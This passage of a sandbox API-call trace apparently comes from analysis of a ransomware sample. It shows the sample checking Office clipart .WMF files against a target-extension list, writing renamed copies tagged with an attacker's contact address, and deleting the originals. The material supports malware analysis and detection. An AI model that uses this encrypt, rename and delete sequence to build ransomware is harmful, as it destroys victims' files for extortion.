returned 68 [0182.838] lstrlenW (lpString=".zip") returned 4 [0182.838] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.838] lstrlenW (lpString=".rar") returned 4 [0182.838] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.838] lstrlenW (lpString=".bz2") returned 4 [0182.838] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.838] lstrlenW (lpString=".7z") returned 3 [0182.838] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") returned 68 [0182.838] lstrlenW (lpString=".dbf") returned 4 [0182.838] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") returned 68 [0182.838] lstrlenW (lpString=".1cd") returned 4 [0182.838] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") returned 68 [0182.838] lstrlenW (lpString=".jpg") returned 4 [0182.838] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") returned 68 [0182.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") returned 68 [0182.839] lstrlenW (lpString=".doc") returned 4 [0182.839] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.839] lstrlenW (lpString=".docx") returned 5 [0182.839] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.839] lstrlenW (lpString=".pdf") returned 4 [0182.839] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.839] lstrlenW (lpString=".xls") returned 4 [0182.839] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.839] lstrlenW (lpString=".xlsx") returned 5 [0182.839] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.839] lstrlenW (lpString=".ppt") returned 4 [0182.839] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") returned 68 [0182.839] lstrlenW (lpString=".zip") returned 4 [0182.839] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.839] lstrlenW (lpString=".rar") returned 4 [0182.839] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.839] lstrlenW (lpString=".bz2") returned 4 [0182.839] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.839] lstrlenW (lpString=".7z") returned 3 [0182.839] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") returned 68 [0182.839] lstrlenW (lpString=".dbf") returned 4 [0182.839] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") returned 68 [0182.839] lstrlenW (lpString=".1cd") returned 4 [0182.839] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") returned 68 [0182.839] lstrlenW (lpString=".jpg") returned 4 [0182.840] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.840] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.840] lstrlenW (lpString="J0107148.WMF") returned 12 [0182.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107148.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.845] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=20136) returned 1 [0182.845] CloseHandle (hObject=0x378) returned 1 [0182.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107148.wmf")) returned 0x220 [0182.846] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107148.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107148.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.846] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.846] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107148.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0182.847] GetLastError () returned 0x0 [0182.847] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x4ea8, lpOverlapped=0x0) returned 1 [0182.849] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x4eb0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x4eb0, lpOverlapped=0x0) returned 1 [0182.850] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.850] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.851] SetEndOfFile (hFile=0x37c) returned 1 [0182.851] CloseHandle (hObject=0x37c) returned 1 [0182.851] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.851] SetEndOfFile (hFile=0x378) returned 1 [0182.852] CloseHandle (hObject=0x378) returned 1 [0182.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.852] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107148.wmf")) returned 1 [0182.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 68 [0182.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 68 [0182.852] lstrlenW (lpString=".doc") returned 4 [0182.852] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.852] lstrlenW (lpString=".docx") returned 5 [0182.852] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.852] lstrlenW (lpString=".pdf") returned 4 [0182.852] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.852] lstrlenW (lpString=".xls") returned 4 [0182.852] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.852] lstrlenW (lpString=".xlsx") returned 5 [0182.852] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.852] lstrlenW (lpString=".ppt") returned 4 [0182.852] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 68 [0182.853] lstrlenW (lpString=".zip") returned 4 [0182.853] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.853] lstrlenW (lpString=".rar") returned 4 [0182.853] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.853] lstrlenW (lpString=".bz2") returned 4 [0182.853] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.853] lstrlenW (lpString=".7z") returned 3 [0182.853] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 68 [0182.853] lstrlenW (lpString=".dbf") returned 4 [0182.853] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 68 [0182.853] lstrlenW (lpString=".1cd") returned 4 [0182.853] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 68 [0182.853] lstrlenW (lpString=".jpg") returned 4 [0182.853] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 68 [0182.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 68 [0182.853] lstrlenW (lpString=".doc") returned 4 [0182.853] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.853] lstrlenW (lpString=".docx") returned 5 [0182.853] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.853] lstrlenW (lpString=".pdf") returned 4 [0182.853] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.853] lstrlenW (lpString=".xls") returned 4 [0182.853] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.853] lstrlenW (lpString=".xlsx") returned 5 [0182.853] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.853] lstrlenW (lpString=".ppt") returned 4 [0182.853] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 68 [0182.854] lstrlenW (lpString=".zip") returned 4 [0182.854] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.854] lstrlenW (lpString=".rar") returned 4 [0182.854] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.854] lstrlenW (lpString=".bz2") returned 4 [0182.854] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.854] lstrlenW (lpString=".7z") returned 3 [0182.854] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 68 [0182.854] lstrlenW (lpString=".dbf") returned 4 [0182.854] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 68 [0182.854] lstrlenW (lpString=".1cd") returned 4 [0182.854] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 68 [0182.854] lstrlenW (lpString=".jpg") returned 4 [0182.854] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.854] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.854] lstrlenW (lpString="J0107150.WMF") returned 12 [0182.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107150.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.855] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=13456) returned 1 [0182.855] CloseHandle (hObject=0x378) returned 1 [0182.855] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107150.wmf")) returned 0x220 [0182.855] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107150.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107150.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.855] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.855] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107150.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0182.856] GetLastError () returned 0x0 [0182.856] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x3490, lpOverlapped=0x0) returned 1 [0182.858] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x34a0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x34a0, lpOverlapped=0x0) returned 1 [0182.859] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.859] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.860] SetEndOfFile (hFile=0x37c) returned 1 [0182.860] CloseHandle (hObject=0x37c) returned 1 [0182.860] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.860] SetEndOfFile (hFile=0x378) returned 1 [0182.861] CloseHandle (hObject=0x378) returned 1 [0182.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.861] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107150.wmf")) returned 1 [0182.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 68 [0182.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 68 [0182.861] lstrlenW (lpString=".doc") returned 4 [0182.861] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.861] lstrlenW (lpString=".docx") returned 5 [0182.861] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.861] lstrlenW (lpString=".pdf") returned 4 [0182.861] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.861] lstrlenW (lpString=".xls") returned 4 [0182.861] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.861] lstrlenW (lpString=".xlsx") returned 5 [0182.861] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.861] lstrlenW (lpString=".ppt") returned 4 [0182.861] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 68 [0182.861] lstrlenW (lpString=".zip") returned 4 [0182.862] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.862] lstrlenW (lpString=".rar") returned 4 [0182.862] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.862] lstrlenW (lpString=".bz2") returned 4 [0182.862] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.862] lstrlenW (lpString=".7z") returned 3 [0182.862] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 68 [0182.862] lstrlenW (lpString=".dbf") returned 4 [0182.862] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 68 [0182.862] lstrlenW (lpString=".1cd") returned 4 [0182.862] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 68 [0182.862] lstrlenW (lpString=".jpg") returned 4 [0182.862] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 68 [0182.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 68 [0182.862] lstrlenW (lpString=".doc") returned 4 [0182.862] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.862] lstrlenW (lpString=".docx") returned 5 [0182.862] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.862] lstrlenW (lpString=".pdf") returned 4 [0182.862] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.862] lstrlenW (lpString=".xls") returned 4 [0182.862] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.862] lstrlenW (lpString=".xlsx") returned 5 [0182.862] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.862] lstrlenW (lpString=".ppt") returned 4 [0182.862] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 68 [0182.863] lstrlenW (lpString=".zip") returned 4 [0182.863] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.863] lstrlenW (lpString=".rar") returned 4 [0182.863] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.863] lstrlenW (lpString=".bz2") returned 4 [0182.863] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.863] lstrlenW (lpString=".7z") returned 3 [0182.863] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 68 [0182.863] lstrlenW (lpString=".dbf") returned 4 [0182.863] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 68 [0182.863] lstrlenW (lpString=".1cd") returned 4 [0182.863] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 68 [0182.863] lstrlenW (lpString=".jpg") returned 4 [0182.863] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.863] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.863] lstrlenW (lpString="J0107152.WMF") returned 12 [0182.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107152.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.864] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=22532) returned 1 [0182.864] CloseHandle (hObject=0x378) returned 1 [0182.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107152.wmf")) returned 0x220 [0182.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107152.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107152.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.864] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.864] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107152.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0182.865] GetLastError () returned 0x0 [0182.865] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x5804, lpOverlapped=0x0) returned 1 [0183.222] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x5810, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x5810, lpOverlapped=0x0) returned 1 [0183.223] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.223] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.223] SetEndOfFile (hFile=0x37c) returned 1 [0183.223] CloseHandle (hObject=0x37c) returned 1 [0183.223] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.223] SetEndOfFile (hFile=0x378) returned 1 [0183.224] CloseHandle (hObject=0x378) returned 1 [0183.224] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.224] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107152.wmf")) returned 1 [0183.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 68 [0183.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 68 [0183.225] lstrlenW (lpString=".doc") returned 4 [0183.225] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.225] lstrlenW (lpString=".docx") returned 5 [0183.225] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0183.225] lstrlenW (lpString=".pdf") returned 4 [0183.225] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.225] lstrlenW (lpString=".xls") returned 4 [0183.225] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.225] lstrlenW (lpString=".xlsx") returned 5 [0183.225] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0183.225] lstrlenW (lpString=".ppt") returned 4 [0183.225] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 68 [0183.225] lstrlenW (lpString=".zip") returned 4 [0183.225] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.225] lstrlenW (lpString=".rar") returned 4 [0183.225] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.225] lstrlenW (lpString=".bz2") returned 4 [0183.225] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.225] lstrlenW (lpString=".7z") returned 3 [0183.225] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 68 [0183.225] 